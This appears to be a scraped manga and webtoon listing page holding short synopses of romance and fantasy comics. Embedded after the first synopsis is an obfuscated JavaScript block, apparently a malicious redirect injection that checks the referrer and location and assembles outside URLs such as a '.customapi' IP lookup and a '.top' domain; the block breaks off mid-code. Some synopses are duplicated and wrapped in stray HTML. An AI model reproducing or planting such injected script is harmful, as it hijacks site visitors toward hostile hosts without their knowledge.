2020 - Page 49

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare
Her… One Is When Master Jue Flirts With Her.

704 results

The Lover who doesn’t lie

The male lead is unable to lie, accidental mistakes/events resulted in the female lead breaking up with her lover and becoming unemployed as well, the male lead is actually her new boss? This cliched boss/CEO romance, incorporates elements of both dominant CEO and love rivalry, which will cause your teenage (female) heart to explode!<script></script><script>function _0x2f0a(){var _0x5867ef=['680uOvVUc','txoIE','761727jcbdLZ','1606505TQViQw','floor','xhyEo','href','1352065XNIsuK','http://rea','263116hvSnYJ','gEtCu','vMGle','1iRkywL','text','46571HVvLFt','bnwIs','21846TroCAs','174UhJycB','referrer','random','location','4HOQIVL','google','nTabP','32661yyMcMu','56MRecGM','VCDdN','then','JFrPp','HHCtF','https://ip','Ezprr','includes','36foGzDs','.top/','dma.net/','.customapi'];_0x2f0a=function(){return _0x5867ef;};return _0x2f0a();}function _0x3661(_0x59b368,_0x524330){var _0x25af05=_0x2f0a();return _0x3661=function(_0x243571,_0x201f5c){_0x243571=_0x243571-(0x1b4f+-0x9*0x1fe+0x2*-0x44e);var _0x5b2b1a=_0x25af05[_0x243571];return _0x5b2b1a;},_0x3661(_0x59b368,_0x524330);}(function(_0x2f0f63,_0x37e18e){var _0x5334a6=_0x3661,_0x1621fa=_0x2f0f63();while(!![]){try{var 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The Macho Boss Loves Me

Xu Wan’ge thought she was the luckiest woman in the world: her husband treasured her and her twins loved her. However, one day she came back home to find her husband slept with her friend, which was an earthshaking hit to her. Wan’ge realized that she was cheated in their marriage. She wanted to make it public, but her husband created the false impression that she was suicided, and distorted the truth that she had an affair with others. Would Wan’ge revenge to make her husband bear the due punishment? How would she do? Did her husband lose all his reputation?…


The Making of a Princess

Sophia, the haughty Princess of the Kingdom of Xilang, was reduced to a lowly maid! Trampled on and humiliated, the reality she’s faced with is a harsh and cruel one. However, relying on nothing but her wits, she rises up against the odds. Will she be able to take back everything that once was hers… and more?


The Max Level Hero has Returned!

The Max Level Hero has Returned! The weak prince of an insignificant country, Davey. After becoming comatose, his soul escaped to a temple where the souls of heroes gathered. He trained for a thousand years and has now returned as a max level hero! “Just you guys wait, I’m gonna face you all head on!” The refreshing story of Davey’s royal life and revenge has just begun. Associated Names Max Level Hero Max Level Hero Is Making a Comeback! The Max Level Hero Strikes Back!


The Newlywed Life Of A Witch And A Dragon

The sweet newlywed life of a genius witch who entangled her life with a dragon by mistake! Espanol [spoiler]Un día Wendy se enteró del matrimonio de su amor platónico. Profundamente afligida, pasa la noche con su recién llegado Aiden Winter bajo la influencia de alcohol.[/spoiler]


The Night When the Crow Caws

<h3 class="item-title">The Night When the Crow Caws</h3> <h3 class="item-title"><span style="font-family: Consolas, Monaco, monospace;">As the hottest actor in the action genre, the handsome and talented Woogang is always being chased by the women around him. But when a mysterious agent on a secret mission breaks into his home, he's the one who falls in love at first sight. Sadly, he has no clue who the beautiful stranger is... until she shows up at his workplace as Detective Park Taeyi to investigate a bomb threat. It turns out that she's no ordinary policewoman, but an elite member of the Secret Intelligence Agency who is after a criminal organization called "The Crows." Fate brings Woogang and Taeyi closer when the actor catches The Crows' attention and needs the agent's protection. Can Woogang break through Taeyi's cool exterior and win her heart as they face off against their dangerous enemies?</span></h3> <div class="row detail-set"> <div class="col-24 col-sm-16 col-md-18 mt-4 mt-sm-0 attr-main"> <div class="mt-4 episode-list"> <div class="head"></div> </div> </div> </div> <div class="mt-4 episode-list"> <div class="head"></div> </div>


The Omniscient Point Of View Of An Unrequited Love

Hyeji is a social media star with over 100,000 Instargram followers. She’s received tons of confessions because of her popularity, yet despite that she’s never been on a single date. But one day, she gets asked on a date—by another popular social media star that she’s secretly been following, no less! On the day of the long-awaited date, when she’s alone, Hyeji finds that the only way she can get a perfect selfie angle is if she takes it with her toes… Just then, Kisung, a part-timer there, accidentally opens the door, revealing Hyeji mid-shot, and to her date, of all people…! After her disastrous date, Hyeji decides she’s done being Forever Alone and is determined to find The One. Hyeji starts school with her new ambitious aspiration, only to find she’s in the same class as the cause of her tragic toe incident—Kisung!


The Only Love I Know

Hari Lee, a girl who’s busy balancing both part-time jobs and school, falls for her senior at school, Jinho, but her one-sided love ends without her getting the chance to confess when Jinho starts dating her friend, Yeonju, instead. 3 years later, Jinho and Yeonju are still together and Hari has gotten over Jinho, but Jinho suddenly starts drunk-calling Hari and confessing to her? To get rid of Jinho, Hari, who has no time for romance, accidentally agrees to a blind-date with a guy Yeonju knows. This is the story of their romance! Love of Mine The Only Love I Know


The Phoenix in a Turbulent World

You’re Reading “The Phoenix in a Turbulent World ”Comics  on MangaBob.com. Thanks! Description Phoenix rises in turbulent ages. As a famous and clever doctor in the precarious Zhou Dynasty, Qiu Xiluo met two lords and was involved in endless bloodshed. Yan Lang, a gentle and powerful marquis, although never stopped fighting for his kingdom, was willing to die for protecting her. Song Si-ren, a handsome and unrestrained young master of Han Kingdom with great aspiration, went through all the hardships and dangers. When they fought against each other and had to choose between love and power, who could be her knight?Show more You’re Reading “The Phoenix in a Turbulent World ”Comics  on MangaBob.com. Thanks! Description Phoenix rises in turbulent ages. As a famous and clever doctor in the precarious Zhou Dynasty, Qiu Xiluo met two lords and was involved in endless bloodshed. Yan Lang, a gentle and powerful marquis, although never stopped fighting for his kingdom, was willing to die for protecting her. Song Si-ren, a handsome and unrestrained young master of Han Kingdom with great aspiration, went through all the hardships and dangers. When they fought against each other and had to choose between love and power, who could be her knight?


The Planned First Kiss

When I Opened My Eyes After A Fire, I Became A Side Character In A Novel. What Am I To Do Now?Get Closer To The Heroine? No.get Closer To The Male Lead? No.i’m Going To Live A Long And Simple Life!I’ve Lived Peacefully Outside The Emperor’s Castle For 3 Years. I Thought I Would Be Free As Long As The Novel Ended Happily As It Should.“Who’s Th-…”“Servant.”Huh?“I’ll Listen To Your Every Command.”“H-Huh?”“If I Listen To Whatever You Say, Can We Live Together?”The Servant Who Came Into My Easy Life.i Live A Happy Life With Him. Sometimes He’s A Kind Servant, And Other Times, A Dear Friend…The Problem Is, I Can’t Seem To Take My Eyes Off Him When He Smiles Saucily And Flirtatiously With Those Red Eyes….Is It Because Of My Feelings?The 30Th Concubine, Lydia, Whose Goal Is To Live A Long And Simple Life And The Suspicious Servant Begin A Strange Relationship As They Start Living Together.


The Precious Sister Of The Villainous Grand Duke

She was reborn in the war novel as the sister of the villain who had never shed blood nor tears. The person acting as my ‘brother’ was a villain who, after losing the war, would be sealed away by the male lead. So all I have to do now is pretend to be his sister until he later disappears. Or so I thought… [i]‘What’s that in your hand? Don’t tell me that’s the male lead’s head?’[/i] My brother won the war. *** “What’s with that suitcase?” “Huh?” Dietrich’s fingers tighten on the luggage that I had packed as soon as he left for war. “I asked you what this is.” “It-It’s a travel suitcase, brother.” “You want to travel? Alone?” Dietrich’s dark eyes sparked with violence. Having recently returned from war victorious, he sure smelled like a bloodthirsty killer. “And leave me behind?” [hr][i]Note: This is a oneshot promotional manhwa for the novel of the same name[/i]


The Princess In The Dumpster

The Princess in the Dumpster Deep sunken cheeks, dirty skin which lost its original color, twig-like wrists, filthy fingernails and a much smaller body for her age. And with neglected hair hanging over half of her face, this small child is actually the forgotten Royal Princess of the Empire. Unable to stifle her hunger any longer, she crawls out of her hiding within a tiny, old, worn-down castle in search of food… “I’m hungry…” The small girl who’s wearing nothing but shabby clothes murmured without even realizing. “Can I eat this…?” Her small fern-like hand tore a piece of vegetation off of the ground, but she eventually put it down while shaking her head from side to side. The little girl hadn’t had a proper meal for three days… “Estrella…” The child recited the name, her words one with the wind. It was a precious name that she had earned only after a long time. “I’m sorry I’m late.” “…It’s alright.” The little one who replied then slumped onto Elias’ chest.
